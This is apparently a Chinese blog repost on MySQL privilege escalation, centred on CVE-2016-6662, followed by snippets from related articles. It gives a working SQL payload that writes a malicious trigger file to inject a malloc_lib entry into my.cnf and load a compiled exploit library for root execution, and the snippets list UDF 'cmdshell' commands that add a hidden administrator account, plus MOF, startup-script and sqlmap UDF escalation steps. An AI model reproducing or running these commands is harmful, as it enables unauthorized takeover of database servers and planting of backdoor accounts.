MYSQL提权方法

        cve-2016-6662 MYSQL提权分析

MySQL  <= 5.7.15       远程代码执行/ 提权 (0day)
        5.6.33
        5.5.52

Mysql分支的版本也受影响,包括:
    MariaDB
    PerconaDB创建bob用户,并赋予file,select,insert权限,创建用于实验的数据库activedb和表active_table

将exp先写入tmp目录,并编译成so文件,需要修改一下ip,port和my.cnf的位置

select "TYPE=TRIGGERS\ntriggers=‘CREATE DEFINER=`root`@`localhost` TRIGGER active_table\nAFTER INSERT\n   ON `active_table` FOR EACH ROW\nBEGIN\n   DECLARE void varchar(550);\n   set global general_log_file=\\\‘/etc/mysql/my.cnf\\\‘;\n   set global general_log = on;\n   select \"\n[mysqld]\nmalloc_lib=\\\‘/tmp/mysql_hookandroot_lib.so\\\‘\n\" INTO void;   \n   set global general_log = off;\nEND‘\nsql_modes=1073741824\ndefiners=‘[email protected]‘\nclient_cs_names=‘latin1‘\nconnection_cl_names=‘latin1_swedish_ci‘\ndb_cl_names=‘latin1_swedish_ci‘" into dumpfile ‘/var/lib/mysql/activedb/active_table.TRG‘;

发现可写的my.cnf会被忽略???不知道为什么(难道打补丁了?),不知道5.5的情况会怎么样,所以先把my.cnf的权限改回来744

文章转发至:http://blog.0kami.cn/2016/09/18/cve-2016-6663-mysql-exp/

时间: 2024-10-12 19:09:45

MYSQL提权方法的相关文章

转载:windows的mysql提权方式

mysql提权语句归纳如下: 一 UDF提权 这类提权方法我想大家已经知道了,我大致写一下,具体语句如下: create function cmdshell returns string soname ’udf.dll’ select cmdshell(’net user iis_user [email protected]#abcABC /add’); select cmdshell(’net localgroup administrators iis_user /add’); select

提权系列(一)----Windows Service 服务器提权初识与exp提权,mysql提权

一.初识提权 很多时候我们入侵一个网站的时候,想要的是得到这个服务器的权限,也就是admin权限,但是一般默认得到的是普通用的地权限,权限很小,所以就要通过其他手段,提升自己的权限. 提权是将服务器的普通用户提升为管理员用户的一种操作,提权常常用于辅助旁注攻击. 下面我们来了解下window的权限(来自百度百科): Windows 提供了非常细致的权限控制项,能够精确定制用户对资源的访问控制能力,大多数的权限从其名称上就可以基本了解其所能实现的内容. " 权限"(Permission)

mysql提权笔记

最近小菜遇到mysql提权,总是会搞错,就记记笔记吧!以后方便用 先说手工吧! mysql<5.0,导出路径随意:5.0<=mysql<5.1,则需要导出至目标服务器的系统目录(如:system32),否则在下一步操作中你会看到“No paths allowed for shared library”错误:mysql>5.1,需要使用 show variables like '%plugin%';语句查看插件安装路径,导出的时候指定DLL路径为插件路径. 现在几乎都是五点几吧!低版

metasploit下Windows的多种提权方法

metasploit下Windows的多种提权方法 前言 当你在爱害者的机器上执行一些操作时,发现有一些操作被拒绝执行,为了获得受害机器的完全权限,你需要绕过限制,获取本来没有的一些权限,这些权限可以用来删除文件,查看私有信息,或者安装特殊程序,比如病毒.Metasploit有很多种后渗透方法,可以用于对目标机器的权限绕过,最终获取到系统权限. 环境要求: 1.攻击机:kali linux 2.目标机:Win 7 在已经获取到一个meterpreter shell后,假如session为1,且权

windows提权方法总结

windwos提权方法分为两大块: 一.系统漏洞 二.第三方软件漏洞 系统信息泄露和配置不当都可能导致系统被入侵,下面总结是一些常用的windows提权方式. 1,SER-TU提权(通常是利用SERFTP服务器管理工具,首先要在安装目录下找到INI配置文件,必须具备可写入的权限) 2,RADMIN提权(大家并不陌生,我们在扫描4899空口令后,同样需要他来连接) 3,PCANYWHRER提权(也是远程客户端软件,下载安装目录的CIF文件进行破解) 4,SAM提权(SAM系统帐户,通常需要下载临时

mysql常用的提权方法

一,利用MOF提权 Windows 管理规范 (WMI) 提供了以下三种方法编译到 WMI 存储库的托管对象格式 (MOF) 文件: 方法 1: 运行 MOF 文件指定为命令行参数将 Mofcomp.exe 文件. 方法 2: 使用 IMofCompiler 接口和 $ CompileFile 方法. 方法 3: 拖放到 %SystemRoot%\System32\Wbem\MOF 文件夹的 MOF 文件. Microsoft 建议您到存储库编译 MOF 文件使用前两种方法.也就是运行 Mofc

mysql提权常用方法

一般是root权限,知道mysql root权限,root账号密码 启动项提权:原理:利用高权限的root写入一个vbs脚本到启动项,再通过一些方法如ddos,社工管理员之类的方法来让服务器重启,运行脚本,达到提取目的1.查看我们进入数据库中有些什么数据表mysql>show tables;默认的情况下,test中没有任何表的存在.以下为关键的部分2.在TEST数据库下创建一个新的表:mysql>create table a (cmd text);好了,我们创建了一个新的表,表名为a,表中只存

MySQL提权

1.利用sqlmap的UDF提权 1.找个可写的目录上传lib_mysqludf_sys.dll,根据mysql的版本导入到windows\system32或者mysql的\lib\plugin目录下 select @@plugin_dir select load_flie('C:\\RECYCLER\\lib_mysqludf_sys.dll') into dumpfile 'C:\\windows\\system32\\lib_mysqludf_sys.dll' 2.创建函数执行命令 cre

Mysql提权总结

mysql默认状态下是不开放对外访问功能的 1.如何设置才能允许外网访问MySQL 使用"mysql -uroot -proot"命令可以连接到本地的mysql服务: 使用"use mysql"命令,选择要使用的数据库,修改远程连接的基本信息,保存在mysql数据库中,因此使用mysql数据库: 使用"GRANT ALL PRIVILEGES ON *.* TO 'root'@'%' IDENTIFIED BY 'root' WITH GRANT OPTI